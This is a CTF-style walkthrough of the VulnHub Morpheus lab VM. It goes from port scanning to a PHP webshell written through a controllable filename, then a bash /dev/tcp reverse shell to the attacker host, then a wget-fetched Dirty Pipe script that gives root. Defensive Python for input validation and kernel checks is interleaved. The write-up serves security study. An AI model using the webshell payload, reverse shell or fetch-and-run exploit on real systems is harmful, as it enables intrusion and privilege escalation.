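Disclaimer: This article documents the walkthrough of the Matrix-Breakout: 2 Morpheus penetration-testing target VM. All operations were performed in a local, authorized environment. The content is for network-security study and defensive research only; do not use it for any illegal purpose. Readers should comply with the Cybersecurity Law and related laws and regulations and help maintain the security of cyberspace.
Environment:
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
I. Information Gathering
1. Discover the target IP address
arp-scan -l # discover all IP addresses on the current network segment
┌──(root㉿kali)-[~]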
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.10
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:48:b9:50 PCS Systemtechnik GmbH
192.168.5.13 08:00:27:c2:8f:37 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.953 seconds (131.08 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-09 04:12 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00013s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00014s latency).
MAC Address: 08:00:27:48:B9:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.13
Host is up (0.00013s latency).
MAC Address: 08:00:27:C2:8F:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.10
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.92 seconds
Target IP: 192.168.5.13
2. Scan the target's open ports
nmap -sV -p- 192.168.5.13
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-09 04:12 -0400
Nmap scan report for 192.168.5.13
Host is up (0.000090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.51 ((Debian))
81/tcp open http nginx 1.18.0
MAC Address: 08:00:27:C2:8F:37 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds
Ports: 22, 80, 81
3. Directory enumeration
dirsearch -u http://192.168.5.13
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.13
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.5.13/_26-03-09_04-13-44.txt
Target: http://192.168.5.13/
[04:13:44] Starting:
[04:13:45] 403 - 277B - /.ht_wsr.txt
[04:13:45] 403 - 277B - /.htaccess.bak1
[04:13:45] 403 - 277B - /.htaccess.sample
[04:13:45] 403 - 277B - /.htaccess.orig
[04:13:45] 403 - 277B - /.htaccess.save
[04:13:45] 403 - 277B - /.htaccess_extra
[04:13:45] 403 - 277B - /.htaccess_orig
[04:13:45] 403 - 277B - /.htaccess_sc
[04:13:45] 403 - 277B - /.htaccessOLD2
[04:13:45] 403 - 277B - /.htaccessBAK
[04:13:45] 403 - 277B - /.htaccessOLD
[04:13:45] 403 - 277B - /.htm
[04:13:45] 403 - 277B - /.html
[04:13:45] 403 - 277B - /.htpasswd_test
[04:13:45] 403 - 277B - /.httr-oauth
[04:13:45] 403 - 277B - /.htpasswds
[04:13:46] 403 - 277B - /.php
[04:14:05] 301 - 317B - /javascript -> http://192.168.5.13/javascript/
[04:14:13] 200 - 47B - /robots.txt
[04:14:14] 403 - 277B - /server-status
[04:14:14] 403 - 277B - /server-status/
Task Completed
dirb http://192.168.5.13
┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.13
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Mar 9 04:13:50 2026
URL_BASE: http://192.168.5.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.13/ ----
+ http://192.168.5.13/index.html (CODE:200|SIZE:348)
==> DIRECTORY: http://192.168.5.13/javascript/
+ http://192.168.5.13/robots.txt (CODE:200|SIZE:47)
+ http://192.168.5.13/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.5.13/javascript/ ----
==> DIRECTORY: http://192.168.5.13/javascript/jquery/
---- Entering directory: http://192.168.5.13/javascript/jquery/ ----
+ http://192.168.5.13/javascript/jquery/jquery (CODE:200|SIZE:287600)
-----------------
END_TIME: Mon Mar 9 04:13:56 2026
DOWNLOADED: 13836 - FOUND: 4
gobuster dir -u http://192.168.5.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 317] [--> http://192.168.5.13/javascript/]
/graffiti.php (Status: 200) [Size: 451]
/server-status (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
II. Exploitation
1. Information gathering
http://192.168.5.13/index.html

http://192.168.5.13/robots.txt

http://192.168.5.13/javascript/

Visiting port 81 shows that it requires a username and password; a few weak credentials were tried, but login did not succeed.

http://192.168.5.13/graffiti.php

Enter 123 in the input box and capture the request with Yakit.

The site appends the submitted content to the file graffiti.txt.

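At this point the question is whether the filename parameter in this POST data is controllable: the content is already controllable, so if the file name is controllable too, a file upload becomes easy. Try saving as 1.php and click send.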
message=123&file=1.php


The file can be accessed successfully, so the next step is to upload a one-line webshell directly.
message=<?= eval($_POST[1])?>&file=2.php

Upload succeeded:

AntSword connected successfully:
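The defensive counterpart to the finding above, as an added example that is not code from the target (the page does not show the PHP source of graffiti.php): a Python sketch of the server-side check that would have refused `file=1.php`. The names `ALLOWED_FILES`, `resolve_target` and `append_message` and the data directory are assumptions made for illustration.

```python
import os
import tempfile
from urllib.parse import parse_qs

# Assumption: the feature only ever needs this one file.
ALLOWED_FILES = {"graffiti.txt"}

def resolve_target(form_body: str, data_dir: str) -> str:
    """Map the client's `file` field to a path, or raise ValueError."""
    fields = parse_qs(form_body, keep_blank_values=True)
    name = fields.get("file", ["graffiti.txt"])[0]
    # Exact-name allowlist: rejects 1.php, 2.php and ../ tricks alike.
    if name not in ALLOWED_FILES:
        raise ValueError(f"file name not allowed: {name!r}")
    base = os.path.realpath(data_dir)
    target = os.path.realpath(os.path.join(base, name))
    # Second layer: a symlink planted under the allowed name must not
    # redirect the write outside the data directory.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path leaves the data directory")
    return target

def append_message(form_body: str, data_dir: str) -> str:
    """Append the `message` field to the validated file; return its path."""
    target = resolve_target(form_body, data_dir)
    fields = parse_qs(form_body, keep_blank_values=True)
    message = fields.get("message", [""])[0]
    with open(target, "a", encoding="utf-8") as fh:
        fh.write(message + "\n")
    return target

if __name__ == "__main__":
    # Constructed demo; the temp dir stands in for a directory outside the web root.
    with tempfile.TemporaryDirectory() as data_dir:
        for body in ("message=123&file=graffiti.txt", "message=123&file=1.php"):
            try:
                print(body, "->", append_message(body, data_dir))
            except ValueError as exc:
                print(body, "-> rejected:", exc)
```

Keeping the data file in a directory the web server does not execute scripts from removes the remaining impact even if a name check is bypassed.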

2. Reverse shell
AntSword:
bash -c 'bash -i >& /dev/tcp/192.168.5.10/1234 0>&1'

kali:
nc -lvnp 1234
The reverse shell connected:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.5.10] from (UNKNOWN) [192.168.5.13] 41092
bash: cannot set terminal process group (464): Inappropriate ioctl for device
bash: no job control in this shell
www-data@morpheus:/var/www/html$
III. Privilege Escalation
1. Check the current Linux kernel version
www-data@morpheus:/var/www/html$ uname -a
uname -a
Linux morpheus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
www-data@morpheus:/var/www/html$
The kernel version of the target machine morpheus, 5.10.0-9-amd64, is within the range affected by the Dirty Pipe vulnerability (CVE-2022-0847).
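How that conclusion can be checked for patch triage, as an added example that is not from the original write-up: a Python function that reads a `uname -a` line and compares the kernel against the upstream Dirty Pipe range (introduced in 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11). It goes beyond the single case above by handling other series; the function names and every sample line except the one from this page are constructed.

```python
import re

# Upstream range for CVE-2022-0847: introduced in 5.8; fixed in the
# stable releases below and in mainline from 5.17 on.
INTRODUCED = (5, 8)
FIXED_STABLE = {(5, 10): 102, (5, 15): 25, (5, 16): 11}
FIXED_MAINLINE = (5, 17)

def upstream_version(uname_a: str):
    """Return (major, minor, patch) for the kernel in a `uname -a` line."""
    # On Debian the release field (5.10.0-9-amd64) is only the ABI name;
    # the real package version follows the word "Debian".
    m = re.search(r"\bDebian (\d+)\.(\d+)\.(\d+)", uname_a)
    if not m:
        fields = uname_a.split()
        if len(fields) < 3:
            raise ValueError("not a uname -a line")
        m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", fields[2])
        if not m:
            raise ValueError("no kernel version found")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def dirty_pipe_status(uname_a: str) -> str:
    """Classify a kernel as 'not affected', 'affected' or 'fixed'."""
    major, minor, patch = upstream_version(uname_a)
    series = (major, minor)
    if series < INTRODUCED:
        return "not affected"
    if series >= FIXED_MAINLINE:
        return "fixed"
    fixed_patch = FIXED_STABLE.get(series)
    if fixed_patch is None:
        return "affected"  # end-of-life series that never got the fix
    return "fixed" if patch >= fixed_patch else "affected"

if __name__ == "__main__":
    # The uname -a output shown above on this page.
    line = ("Linux morpheus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 "
            "(2021-09-30) x86_64 GNU/Linux")
    print(upstream_version(line), dirty_pipe_status(line))
```

Distribution kernels can carry a backported fix under a lower upstream number, so an "affected" result should be confirmed against the vendor's advisory for the installed package.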
2. Privilege escalation
kali:
git clone https://github.com/imfiver/CVE-2022-0847.git
ls
cd CVE-2022-0847
ls
mv Dirty-Pipe.sh dp.sh
ls
python -m http.server 80
┌──(root㉿kali)-[~]
└─# git clone https://github.com/imfiver/CVE-2022-0847.git
正克隆到 'CVE-2022-0847'...
remote: Enumerating objects: 40, done.
remote: Counting objects: 100% (40/40), done.
remote: Compressing objects: 100% (36/36), done.
remote: Total 40 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
接收对象中: 100% (40/40), 11.38 KiB | 11.38 MiB/s, 完成.
处理 delta 中: 100% (9/9), 完成.
┌──(root㉿kali)-[~]
└─# ls
1.txt 2.txt 45010.c CVE-2022-0847 exp1 reports
┌──(root㉿kali)-[~]
└─# cd CVE-2022-0847
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# ls
Dirty-Pipe.sh README.md
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# mv Dirty-Pipe.sh dp.sh
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# ls
dp.sh README.md
┌──(root㉿kali)-[~/CVE-2022-0847]
└─#
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.5.13 - - [09/Mar/2026 04:45:30] "GET /dp.sh HTTP/1.1" 200 -
Target:
cd /tmp
ls
wget http://192.168.5.10/dp.sh
ls
chmod +x dp.sh
./dp.sh
id
whoami
cd /root
ls
cat FLAG.txt
www-data@morpheus:/var/www/html$ cd /tmp
cd /tmp
www-data@morpheus:/tmp$ ls
ls
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$ wget http://192.168.5.10/dp.sh
wget http://192.168.5.10/dp.sh
--2026-03-09 16:45:36-- http://192.168.5.10/dp.sh
Connecting to 192.168.5.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4855 (4.7K) [application/x-sh]
Saving to: 'dp.sh'
0K .... 100% 85.6M=0s
2026-03-09 16:45:36 (85.6 MB/s) - 'dp.sh' saved [4855/4855]
www-data@morpheus:/tmp$ ls
ls
dp.sh
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$ chmod +x dp.sh
chmod +x dp.sh
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$ ./dp.sh
./dp.sh
/etc/passwd已备份到/tmp/passwd
It worked!
# 恢复原来的密码
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls
FLAG.txt
cat FLAG.txt
You've won!
Let's hope Matrix: Resurrections rocks!
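The techniques described in this article apply only to authorized test environments or legitimate CTF events. Do not test any system without authorization. The road of security begins with compliance and ends with responsibility.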